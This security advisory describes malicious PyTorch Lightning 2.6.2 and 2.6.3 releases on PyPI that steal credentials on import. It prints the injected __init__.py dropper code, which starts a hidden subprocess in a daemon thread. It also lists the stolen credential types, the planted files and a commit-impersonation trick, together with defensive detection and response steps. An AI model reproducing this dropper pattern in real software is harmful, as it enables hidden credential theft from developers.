Socket Research,
Aikido Security,
and StepSecurity all confirmed today that two new releases of the
popular PyTorch Lightning Python package (lightning
on PyPI) are malicious. Versions 2.6.2 and
2.6.3, both published April 30, 2026, contain
a credential-stealing payload injected directly into the
package's __init__.py, which means the malware runs
on any import lightning. The earlier
2.6.1 release (January 30, 2026) was not identified
as malicious in the initial reports, but the entire
lightning project is currently under PyPI
quarantine and not installable from PyPI until the review
resolves; reinstall guidance below uses internal artifacts and
verified lockfile caches in preference to PyPI itself.
Socket's AI scanner flagged the malicious versions within
eighteen minutes of publication; PyPI has reportedly quarantined
the project. The campaign is being tracked as "Mini
Shai-Hulud," a worm-family extension of the Bitwarden
CLI and SAP npm compromises from earlier this week, which Socket
links via shared technical signatures to Checkmarx, Telnyx,
LiteLLM, and the Aqua Security Trivy compromise. Lightning's
maintainers say they "are aware of the issue and are actively
investigating."
Framing note: this is not currently best understood as a code vulnerability in Lightning itself; it is a compromised package-distribution incident involving malicious PyPI releases. There is no CVE assigned at time of writing. The response is package hygiene plus credential rotation, not patching.
The lightning package receives hundreds of
thousands of downloads per day. The malicious versions were
live on PyPI for an unknown but non-trivial window before
quarantine. The malware runs on import (not just during
install) and ships an 11 MB obfuscated JavaScript payload
that steals SSH keys, cloud credentials, GitHub and npm
tokens, MCP / Claude Code configuration files, cryptocurrency
wallets, and VPN credentials, then encrypts the stolen data
and exfiltrates it through attacker-created or
attacker-accessible public GitHub repositories under the
victim's own account. It also self-propagates by
modifying the developer's local npm packages with malicious
postinstall hooks. Treat any host that imported
2.6.2 or 2.6.3 as fully compromised.
The injected code in __init__.py:
def _run_runtime() -> None:
_runtime_dir = os.path.join(os.path.dirname(__file__), "_runtime")
_start = os.path.join(_runtime_dir, "start.py")
if os.path.exists(_start):
subprocess.Popen(
[sys.executable, _start],
cwd=_runtime_dir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
threading.Thread(target=_run_runtime, daemon=True).start()
Standard tradecraft: detached subprocess, suppressed
stdout / stderr, daemon thread, hidden directory.
Identical structural pattern to the
Bitwarden CLI
compromise (bw1.js +
~/.checkmarx/mcp/mcpAddon.js dropper),
Bun-based JavaScript execution and all.
Confirmed by Socket, Aikido, and StepSecurity:
lightning 2.6.2 and 2.6.3 contain a malicious
_runtime/ directory and modified
__init__.py that auto-executes a credential-stealer
on import. Same campaign infrastructure as the SAP npm
compromise (April 29) and the Bitwarden CLI compromise
(April 23).
Reported by The Hacker News and Cyber Kendra:
PyPI has quarantined the lightning project. A
community member's tracking issue (#21689 in Lightning-AI's
repository) was closed within one minute by an account named
pl-ghost, which posted a "SILENCE DEVELOPER" meme
in response, behavior that strongly suggests the project's
GitHub account itself is compromised. Lightning AI maintainers
have separately acknowledged: "we are aware of the issue
and are actively investigating."
Attribution context: Socket attributes the campaign to the "Mini Shai-Hulud" worm family, an extension of the broader Shai-Hulud / TeamPCP-adjacent cluster that has been linked through shared technical signatures to recent Checkmarx, Bitwarden, Telnyx, LiteLLM, and Aqua Security Trivy compromises. As with the xinference and Bitwarden incidents, treat the campaign-association as the researchers' call based on tradecraft overlap, not settled actor attribution.
Unclear at time of writing: precise window
during which 2.6.2 / 2.6.3 were pullable from PyPI; whether
additional Lightning AI packages on the same release pipeline
(pytorch-lightning, lightning-utilities,
lightning-cloud, etc.) are affected; how the
attacker obtained Lightning AI's PyPI publishing credentials
(the prevailing hypothesis across reporting is GitHub account
compromise, but it has not been confirmed by Lightning AI yet);
formal incident bulletin from Lightning AI.
Attribution remains fluid. Current reporting connects the behavior to the Mini Shai-Hulud campaign based on shared payload tradecraft (Bun bootstrapper, GitHub-public-repo exfiltration, RSA-2048 encryption, Claude Code commit impersonation). Claims circulating around TeamPCP and LAPSUS$, including a PGP-signed message attributed to TeamPCP, should be treated as unverified unless and until independently confirmed by trusted incident-response sources. Socket has explicitly noted it has not verified the PGP signature or independently confirmed the claimed relationships.
Why this one matters more than most
lightning is the high-level training framework
most ML practitioners build on top of PyTorch. It receives
hundreds of thousands of downloads per day and millions per
month. The population of machines that import it is exactly
the population that holds the highest-value collateral for
this kind of campaign: model-training rigs with cloud
credentials for compute, AI infrastructure deployments with
vault tokens, MLOps CI runners with broad publishing scope,
and developer workstations with the entire "modern AI/ML
developer" credential surface (HuggingFace, Weights &
Biases, GitHub, npm, AWS / GCP / Azure, MCP / Claude Code).
The Claude-Code-impersonation detail is worth flagging separately. Per Socket: every poisoned commit pushed by the worm is authored using a hardcoded identity designed to impersonate Anthropic's Claude Code. That's a deliberate camouflage choice, AI-authored commits are increasingly common in repositories using Claude Code or Cursor, so a malicious commit attributed to Claude Code blends in with legitimate AI-assisted activity in audit logs. Worth knowing for any team that uses AI coding tools in production.
How this fits the campaign
Same playbook, different package, eight days in a row:
-
April 22, Checkmarx KICS on Docker Hub +
cx-dev-assist/ast-resultson Open VSX. C2:audit.checkmarx[.]cx. - April 22, xinference on PyPI (versions 2.6.0–2.6.2). Different exfil host, similar tradecraft, attribution contested.
- April 23, Bitwarden CLI on npm (version 2026.4.0). Same C2 as Checkmarx, identified as "Shai-Hulud: The Third Coming" via embedded malware branding.
- April 29, SAP npm packages + intercom-client 7.0.4 on npm. Same Bun-based payload pattern, "Mini Shai-Hulud" branding.
- April 30, PyTorch Lightning on PyPI (2.6.2, 2.6.3). Same Bun-based payload pattern, this time crossing from npm back to PyPI.
Two patterns to flag for operators. First, the campaign now has cross-ecosystem reach, the same toolkit hits npm and PyPI within 24 hours. Second, the targets are increasingly AI/ML and CI/CD-adjacent: a security scanner, a password manager CLI, an inference runtime, an SDK, and now a model training framework. The attacker is picking high-trust packages whose installation footprint runs in credential-rich environments.
Am I affected?
If lightning 2.6.2 or 2.6.3 was installed
and imported on any developer workstation, CI
runner, training host, MLOps pipeline, container image,
notebook environment, or Kubernetes pod, treat the host as
fully compromised.
Installed but no evidence of import is lower
confidence of execution, not "safe." The malicious
code runs from __init__.py, which means
pip install alone does not trigger it, but
any Python process on the host that imports
lightning does. ML / Python tooling imports
packages implicitly all the time: notebook startup, IDE
test discovery, REPL sessions, CI test jobs, application
startup paths, sidecar processes, and so on. Before
downgrading severity for an install-only host, confirm via
process logs, shell history, notebook server logs,
container runtime logs, and CI job logs that no Python
process actually loaded the package. If you can't confirm
a clean import history, treat as compromised.
Quick checks
On any host you suspect:
pip show lightning 2>/dev/null | grep -E '^Version:'
Or to find every installed copy across user, system, and venv paths:
find / -name "lightning" -type d 2>/dev/null | xargs -I{} sh -c 'test -d "{}/_runtime" && echo "FOUND: {}"'
The presence of a _runtime/ subdirectory inside
any installed lightning package is the highest-signal
indicator: legitimate Lightning releases do not contain this
directory. Search every Python environment, including
uv and poetry caches, conda envs,
Docker layer caches, and CI runner working directories.
Search lockfiles and build logs across the whole environment for any reference to the malicious versions:
grep -rE 'lightning[=@"][ "]?2\.6\.[23]\b' . 2>/dev/null
Response, if you imported 2.6.2 or 2.6.3
-
Isolate the host and the PyPI / npm caches.
Pull affected hosts off the network or block outbound
traffic. Run
pip uninstall lightningin every affected environment, then purge package caches:pip cache purge,rm -rf ~/.cache/uv, and clear conda / poetry caches per their own commands. Rebuild any container images that were built off the malicious versions. Remove adjacent Lightning packages (pytorch-lightning,lightning-utilities, etc.) only if your lockfile / environment requires a full dependency reset, or if later advisories specifically name them; the confirmed malicious package islightningon its own. Prefer rebuilding the environment from a known-good lockfile rather than ad hoc partial cleanup. -
Reinstall from a known-good source, not PyPI.
The
lightningproject is currently quarantined on PyPI, so direct reinstall from PyPI is not possible during admin review. Prefer, in this order: (1) a verified internal artifact you already know is clean, (2) a lockfile-pinned wheel from a cache that predates the malicious publishes, (3) a maintainer-confirmed release once Lightning AI publishes one. The pre-incident release2.6.1was not identified in the initial malicious-version reports, but until the project quarantine and any maintainer advisory resolve, do not assume any specific version is safe to pull directly from PyPI; treat 2.6.1 as the rollback target only if you have it from a trusted source already. -
Rotate every credential class the payload targets.
Per Aikido's analysis, the payload harvests:
SSH private keys; shell histories
for bash, zsh, Python, Node, MySQL, psql;
.envfiles; git credentials; AWS / GCP / Azure credentials; Kubernetes and Helm configs; Docker credentials; npm tokens; MCP / Claude Code configuration files; cryptocurrency wallets (Bitcoin, Litecoin, Monero, Dogecoin, Dash, Exodus, Atomic, Ledger); VPN credentials (NordVPN, ProtonVPN, CyberGhost, Windscribe, OpenVPN); Discord / Slack session data. For an ML host, also rotate HuggingFace tokens, Weights & Biases API keys, Anthropic / OpenAI API keys, and any model-provider credentials in the environment. -
Hunt your GitHub organization for malicious
commits and unauthorized public repositories. Per
Socket, the worm creates public repositories under the
victim's account to host RSA-2048-encrypted exfiltrated
data, and also commits poisoned files to branches the
affected token has write access to. Check every account
that had a token on an affected host for: any newly-created
public repo (especially unfamiliar names); commits authored
by what appears to be Claude Code but originated from an
environment where Claude Code is not in use; and silent
overwrites of files. The worm's operation is upsert: it
overwrites without prechecking, so a legitimate file may
have been replaced with a poisoned version. Audit
every branch the affected token could write to, not only
the default branch. Look specifically for planted
files at:
.claude/router_runtime.js,.claude/settings.json,.github/workflows/format-check.yml, and.vscode/payloads. Per Socket, the worm targets up to 50 branches per writable repository. -
If you publish npm packages, audit them.
The worm modifies local npm packages on the victim's
machine: it adds a
postinstallhook topackage.jsonthat invokes the malicious payload, bumps the patch version, and repacks the.tgztarball. If a developer on an affected host later rannpm publish, those compromised versions are now live on npm. For every npm package your org publishes, audit recent versions for unexpectedpostinstallentries and unexpected version bumps. Yank or deprecate anything that looks wrong. -
Hunt for the worm's host-side artifacts.
Look for any directory called
_runtime/inside an installedlightningpackage. Look for unexpected Bun runtime installations on hosts that don't otherwise use Bun. Look for the file hashes in the IOC block on disk and, if your EDR captured them, in process memory. Inspect outbound network logs for connections to GitHub frompythonprocesses that don't normally contact GitHub. - Rebuild, don't clean. For any production host, training rig, or CI runner, wipe and rebuild from known-clean media. The worm's exfiltration is loud (encrypted blobs to public repos) but its persistence surface, including any second-stage tooling the 11 MB JS payload may have dropped, is not fully characterized in public reporting yet. Don't try to clean piecewise.
-
Push the IOCs into your detection. SHA256
hashes for
router_runtime.jsandstart.pyin your EDR and file-integrity monitoring. SIEM detections for: presence of_runtime/directories inside Python packages, unexpected Bun runtime invocations from Python processes, creation of public GitHub repositories under organization accounts, commits authored as Claude Code from environments where Claude Code is not in use. - Document the rotation. Keep a record of every credential rotated and when. Standard incident hygiene; if a downstream incident surfaces in the next weeks (and given the campaign's velocity, more compromises are likely), you want to be able to reconstruct your rotation timeline cleanly.
If your project depends on lightning directly
or transitively (LangChain integrations, model-serving
frameworks, training-as-a-service products, internal MLOps
platforms), audit your lockfiles and recent build logs for
2.6.2 / 2.6.3. A pip install -U during the
exposure window could have pulled the malicious version
into a build that was then signed and shipped. If any of
your release pipelines could have run with the malicious
Lightning installed, treat the resulting artifacts as
suspect until proven otherwise.
The broader pattern
Three observations after eight days of this campaign that are worth flagging:
First, the targeting is now overtly AI/ML-flavored.
xinference (model-serving), Bitwarden CLI
(secrets-adjacent dev tooling), and now Lightning (the
dominant PyTorch training framework) all sit at the
credential-rich layer of an AI/ML stack. The credential set
this worm targets, including Claude Code and MCP
configuration files specifically, is a deliberate
pick. AI-developer credentials are now treated as a
high-value harvest, not an afterthought.
Second, the Claude Code commit-author impersonation is a new tradecraft element. AI-authored commits are increasingly normal in active repositories, which means a malicious commit signed as Claude Code reads as legitimate to most reviewers and audit tools. If your organization uses AI coding tools, your detection rules should now include "commits attributed to AI tools but pushed from environments where those tools are not configured." Trust-but-verify on AI-authored activity is the new baseline.
Third, the cross-ecosystem velocity is real. The same operator (or operator family) compromised SAP npm packages on April 29 and PyTorch Lightning on PyPI on April 30, with overlapping tradecraft and shared payload structure. Defenses that are scoped to a single ecosystem (npm-only, PyPI-only) are increasingly under-scoped. Tools like Aikido Safe Chain, Socket, and Snyk that watch both registries are doing the right thing structurally; orgs running their own detection should match that breadth.
If lightning 2.6.2 or 2.6.3 was imported on
any host in your environment: isolate it, purge package
caches, reinstall only from a verified internal artifact or
trusted lockfile cache (the project is quarantined on PyPI;
do not pull directly from PyPI during the quarantine), rotate every developer / cloud / ML / npm / Claude-Code
credential the host touched, hunt your GitHub org for
unauthorized public repos and Claude-Code-impersonating
commits, audit any npm packages you publish for unexpected
postinstall hooks, and rebuild affected
hosts. The malware runs on import, not just on install,
so the moment any Python process imported it, the host
is compromised.